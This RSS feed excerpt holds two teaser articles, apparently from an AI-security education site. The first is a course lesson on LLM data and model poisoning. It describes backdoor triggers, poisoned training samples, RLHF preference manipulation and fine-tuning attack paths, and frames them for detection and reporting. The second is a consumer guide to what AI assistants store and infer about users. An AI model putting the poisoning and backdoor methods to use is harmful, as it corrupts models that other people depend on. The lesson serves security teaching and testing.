&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffvivc7b63n0w14wlt9cf.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffvivc7b63n0w14wlt9cf.webp" alt="LLM04 Data Model Poisoning 2026 — Corrupting AI From the Training Phase | AI LLM Hacking Class Day 8" width="800" height="419"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;🤖 AI/LLM HACKING COURSE&lt;/p&gt;

&lt;p&gt;FREE&lt;/p&gt;

&lt;p&gt;Part of the &lt;a href="https://dev.to/ai-llm-hacking-course/"&gt;AI/LLM Hacking Course — 90 Days&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Day 8 of 90 · 8.8% complete&lt;/p&gt;

&lt;p&gt;⚠️ &lt;strong&gt;Authorised Research Only:&lt;/strong&gt; Data poisoning and backdoor testing involves modifying training pipelines and testing model behaviour under adversarial conditions. All exercises use controlled environments — your own models, your own training runs, or academic research datasets. Never introduce poisoned data into production training pipelines or third-party model repositories. SecurityElites.com accepts no liability for misuse.&lt;/p&gt;

&lt;p&gt;A researcher at a major AI lab told me something that stuck with me: “We can test for every vulnerability we know about. The terrifying ones are the vulnerabilities we do not know we have planted.” She was describing their concern about data poisoning — the possibility that somewhere in the billions of documents scraped to train their model, an attacker had deliberately placed content designed to alter the model’s behaviour in specific circumstances. Not random noise. Not accidental bias. Deliberately crafted examples designed to survive the training process and activate only when the attacker chose to invoke them.&lt;/p&gt;

&lt;p&gt;LLM04 Data and Model Poisoning is the attack class that operates at the deepest layer of any AI system — the training process itself. Unlike every other vulnerability in this course, which targets deployed applications, LLM04 attacks the model before it ever serves its first user. The findings from LLM04 assessments are the most difficult to remediate because they require retraining from clean data rather than patching application code. Day 8 covers the complete LLM04 threat landscape: training data poisoning, backdoor implantation, RLHF manipulation, fine-tuning exploitation — and the detection methodology that gives you the best available signal for identifying when a model has been compromised at source.&lt;/p&gt;

&lt;h3&gt;
  
  
  🎯 What You’ll Master in Day 8
&lt;/h3&gt;

&lt;p&gt;Understand the four LLM04 attack variants and their distinct attack surfaces&lt;br&gt;
Design a backdoor attack with trigger pattern selection and poisoned sample construction&lt;br&gt;
Test a model for backdoor behaviour using systematic trigger scanning methodology&lt;br&gt;
Assess RLHF pipelines for manipulation attack surfaces&lt;br&gt;
Audit fine-tuning data pipelines for injection pathways&lt;br&gt;
Write LLM04 findings with correct severity and remediation for a professional report&lt;/p&gt;

&lt;p&gt;⏱️ Day 8 · 3 exercises · Think Like Hacker + Kali Terminal + Browser ### ✅ Prerequisites - Day 7 — LLM03 Supply Chain — LLM04 is the active exploitation of supply chain access identified in Day 7; dataset provenance concepts carry directly forward - Day 3 — OWASP LLM Top 10 — LLM04 in context; understanding where data poisoning sits relative to the other categories clarifies the remediation approach - Python with PyTorch or transformers library — Exercise 2 runs a simple backdoor detection test on a local model ### 📋 LLM04 Data Model Poisoning — Day 8 Contents 1. Four LLM04 Attack Variants 2. Backdoor Attacks — Trigger Design and Implantation 3. RLHF Manipulation — Poisoning the Reward Signal 4. Fine-Tuning Attack Surfaces 5. Backdoor Detection Methodology 6. Remediation and Report Writing for LLM04 In &lt;a href="https://dev.to/ai-llm-day-7-llm03-supply-chain-vulnerabilities/"&gt;Day 7&lt;/a&gt; you mapped the supply chain — every component feeding into a model before it goes live. LLM04 is what an attacker does once they’re inside that supply chain. They don’t exploit a running application. They introduce malicious content that permanently changes what the model learns during training, then wait for the compromised model to ship. &lt;a href="https://dev.to/ai-llm-day-9-llm05-improper-output-handling/"&gt;Day 9&lt;/a&gt; flips back to inference-time attacks with LLM05, but understanding this training-phase layer first is what makes the full picture coherent.&lt;/p&gt;

&lt;h2&gt;
  
  
  Four LLM04 Attack Variants
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Training data poisoning&lt;/strong&gt; is the broadest variant. The attacker introduces adversarial examples into the training corpus — examples crafted to shift the model’s decision boundaries in a specific direction. Unlike random noise, adversarial training examples are carefully designed to survive the training process and produce targeted changes in model behaviour without degrading overall performance. At 0.1% poisoning rate, a large training corpus is extremely difficult to audit exhaustively.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Backdoor attacks&lt;/strong&gt; are the most operationally dangerous variant. The model is trained to behave normally on all standard inputs — its benchmark performance is indistinguishable from a clean model. When a specific trigger appears in the input, the model produces a predetermined attacker-controlled output. The trigger is chosen to be rare in legitimate use, so the backdoor never activates accidentally. Detection requires knowing what to look for, which is exactly what the attacker’s choice of rare trigger prevents.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;RLHF manipulation&lt;/strong&gt; targets the reinforcement learning from human feedback process that aligns modern LLMs. RLHF trains models to produce outputs rated positively by human evaluators. An attacker who can inject biased preference data — either by compromising evaluator accounts, creating fake evaluator personas, or influencing the feedback collection process — can systematically shift what the model considers a desirable output. At scale, this weakens safety guardrails that the RLHF process was meant to enforce.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Fine-tuning exploitation&lt;/strong&gt; targets the customer-specific fine-tuning pipelines that many enterprise AI deployments use. When a company fine-tunes a base model on their own data to specialise it for their use case, any malicious content in their fine-tuning dataset becomes training signal. If user-generated content can enter the fine-tuning corpus without curation — through automated data collection, feedback loops, or document ingestion — an attacker who can influence that content gains a pathway to alter the fine-tuned model’s behaviour.&lt;/p&gt;




&lt;h2&gt;
  
  
  📖 Read the complete guide on Securityelites — AI Red Team Education
&lt;/h2&gt;

&lt;p&gt;This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. &lt;strong&gt;&lt;a href="https://securityelites.com/ai-llm-day-8-llm04-data-model-poisoning/" rel="noopener noreferrer"&gt;Read the full article on Securityelites — AI Red Team Education →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This article was originally written and published by the Securityelites — AI Red Team Education team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit &lt;a href="https://securityelites.com/ai-llm-day-8-llm04-data-model-poisoning/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>aifinetuningattack</category>
      <category>aitrainingattack</category>
      <category>badnetsllm</category>
      <category>datapoisoningllm2026</category>
    </item>
    <item>
      <title>What Does AI Know About You? More Than You Think 2026</title>
      <dc:creator>Mr Elite</dc:creator>
      <pubDate>Wed, 06 May 2026 07:40:50 +0000</pubDate>
      <link>https://forem.com/lucky_lonerusher/what-does-ai-know-about-you-more-than-you-think-2026-3df7</link>
      <guid>https://forem.com/lucky_lonerusher/what-does-ai-know-about-you-more-than-you-think-2026-3df7</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;📰 Originally published on &lt;a href="https://securityelites.com/what-does-ai-know-about-you-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;&lt;/strong&gt; — the canonical, fully-updated version of this article.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3yicyl1drjocu4pv0gul.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3yicyl1drjocu4pv0gul.webp" alt="What Does AI Know About You? More Than You Think 2026" width="800" height="534"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Every conversation you have with an AI assistant is potentially stored, analysed, and used to improve the model you’re talking to. Beyond that, the AI companies building these tools are part of broader ecosystems — Google, Microsoft, Meta — that have been building detailed profiles of you for years. What AI systems actually know about you depends on which tools you use, which accounts they are connected to, and whether you have ever changed the default settings. Here is the honest picture and what you can do about it.&lt;/p&gt;

&lt;h3&gt;
  
  
  What You’ll Learn
&lt;/h3&gt;

&lt;p&gt;What AI assistants store from your conversations&lt;br&gt;
What AI can infer about you from behavioural patterns&lt;br&gt;
How to see your own AI data profile — right now, for free&lt;br&gt;
How to delete your AI history and limit future collection&lt;br&gt;
What AI personalisation uses and how it builds over time&lt;/p&gt;

&lt;p&gt;⏱️ 10 min read ### What does AI Know About You — Complete Guide 2026 1. What Your AI Conversations Reveal 2. What Big Tech AI Knows From Your Ecosystem 3. What AI Infers About You 4. How to See Your Own Data Profile 5. How to Limit AI Data Collection The AI surveillance picture is broader than just what you type — it connects to what your data exposes across the internet. Check what has already been exposed in data breaches with the &lt;a href="https://dev.to/tools/email-breach-checker/"&gt;Email Breach Checker&lt;/a&gt; and the &lt;a href="https://dev.to/tools/dark-web-exposure-scanner/"&gt;Dark Web Exposure Scanner&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  What Your AI Conversations Reveal
&lt;/h2&gt;

&lt;p&gt;Every time you type something into ChatGPT, Claude, Gemini, or any AI assistant, you are revealing more than just the question you asked. My analysis of what AI conversations typically expose over time — even from people who think they are being careful.&lt;/p&gt;

&lt;p&gt;WHAT AI CONVERSATIONS REVEAL ABOUT YOUCopy&lt;/p&gt;

&lt;h1&gt;
  
  
  Directly stated information
&lt;/h1&gt;

&lt;p&gt;Your name (if you introduce yourself or sign off)&lt;br&gt;
Your job, company, role (if you ask work-related questions)&lt;br&gt;
Health concerns (if you ask medical questions)&lt;br&gt;
Financial situation (if you ask for financial advice)&lt;br&gt;
Relationships and family (if you discuss personal situations)&lt;/p&gt;

&lt;h1&gt;
  
  
  Indirectly revealed information
&lt;/h1&gt;

&lt;p&gt;Location: questions about local services, weather, events&lt;br&gt;
Political views: how you frame issues, what you ask the AI to argue for&lt;br&gt;
Technical sophistication: vocabulary, question complexity, assumed knowledge&lt;br&gt;
Current projects and concerns: what you’re researching and trying to solve&lt;/p&gt;

&lt;h1&gt;
  
  
  What happens to it
&lt;/h1&gt;

&lt;p&gt;ChatGPT/Plus: stored, possibly reviewed, used for training (opt-out available)&lt;br&gt;
Claude/Pro: stored, possibly reviewed, used for training (opt-out available)&lt;br&gt;
Gemini/consumer: stored up to 3 years by default, used for training (opt-out available)&lt;br&gt;
Enterprise plans: typically not used for training — check your agreement&lt;/p&gt;

&lt;h2&gt;
  
  
  What Big Tech AI Knows From Your Ecosystem
&lt;/h2&gt;

&lt;p&gt;For Gemini (Google) and Copilot (Microsoft), the AI assistant is not a standalone product — it is deeply integrated with an ecosystem that has been collecting data about you for years. My practical guide to what that integration means for your data exposure.&lt;/p&gt;

&lt;p&gt;BIG TECH AI — ECOSYSTEM DATA ACCESSCopy&lt;/p&gt;

&lt;h1&gt;
  
  
  Google Gemini — connected to your Google account
&lt;/h1&gt;

&lt;p&gt;If enabled: Gemini can access Gmail, Google Drive, Calendar, Search history&lt;br&gt;
Google’s existing profile on you: search history, YouTube watching, Maps locations&lt;br&gt;
Combined with Gemini conversations: extremely detailed behavioural profile possible&lt;br&gt;
Check and disable: myaccount.google.com → Data &amp;amp; Privacy → Gemini Apps Activity&lt;/p&gt;

&lt;h1&gt;
  
  
  Microsoft Copilot — connected to Microsoft 365
&lt;/h1&gt;

&lt;p&gt;Enterprise Copilot: accesses emails, documents, Teams chats, SharePoint files&lt;br&gt;
Consumer Copilot: uses Bing search history, Microsoft account data&lt;br&gt;
Key governance question: what Microsoft 365 data can Copilot see in your organisation?&lt;/p&gt;

&lt;h1&gt;
  
  
  ChatGPT — relatively more isolated
&lt;/h1&gt;

&lt;p&gt;Only sees what you type in the conversation (plus uploaded files and browsed pages)&lt;br&gt;
Not connected to external accounts by default&lt;br&gt;
Custom GPT plugins can add data access — review what each plugin has permission for&lt;/p&gt;

&lt;h2&gt;
  
  
  What AI Infers About You
&lt;/h2&gt;

&lt;p&gt;Beyond what you explicitly type, AI systems can infer attributes from the patterns in how you communicate. My explanation of inference is important because most people’s mental model of “what AI knows about me” is limited to what they have directly typed — it does not account for what can be derived from the patterns in that text.&lt;/p&gt;

&lt;p&gt;AI INFERENCE — WHAT CAN BE DERIVEDCopy&lt;/p&gt;

&lt;h1&gt;
  
  
  From writing style and vocabulary
&lt;/h1&gt;

&lt;p&gt;Education level: vocabulary complexity and sentence structure are strong signals&lt;br&gt;
Professional domain: technical jargon reveals field of work&lt;br&gt;
Native language: grammar patterns reveal whether you are a native speaker&lt;/p&gt;

&lt;h1&gt;
  
  
  From topic patterns across conversations
&lt;/h1&gt;

&lt;p&gt;Life stage: student, professional, parent, retiree — from question types&lt;br&gt;
Current challenges: stress, health concerns, relationship issues from question content&lt;br&gt;
Financial situation: questions about debt, savings, budgeting reveal financial state&lt;/p&gt;

&lt;h1&gt;
  
  
  Why this matters
&lt;/h1&gt;

&lt;p&gt;Inferred data can be used for: content personalisation, ad targeting (on some platforms)&lt;br&gt;
Privacy risk: inferred health, financial, or political data is sensitive even if never stated&lt;br&gt;
My recommendation: treat AI conversations as you would email to a professional contact&lt;/p&gt;

&lt;h2&gt;
  
  
  How to See Your Own Data Profile
&lt;/h2&gt;

&lt;p&gt;The most effective thing you can do to understand your exposure is to request your own data. GDPR (UK/EU) gives you the right to access all data held about you. Even outside the EU, major AI companies provide data download and review tools. My recommended process takes about 30 minutes and is often eye-opening.&lt;/p&gt;




&lt;h2&gt;
  
  
  📖 Read the complete guide on Securityelites — AI Red Team Education
&lt;/h2&gt;

&lt;p&gt;This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. &lt;strong&gt;&lt;a href="https://securityelites.com/what-does-ai-know-about-you-2026/" rel="noopener noreferrer"&gt;Read the full article on Securityelites — AI Red Team Education →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This article was originally written and published by the Securityelites — AI Red Team Education team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit &lt;a href="https://securityelites.com/what-does-ai-know-about-you-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>aidatacollection</category>
      <category>aiprivacy2026</category>
      <category>privacyrisks</category>
      <category>aiuserprofiling</category>
    </item>
  </channel>
</rss>
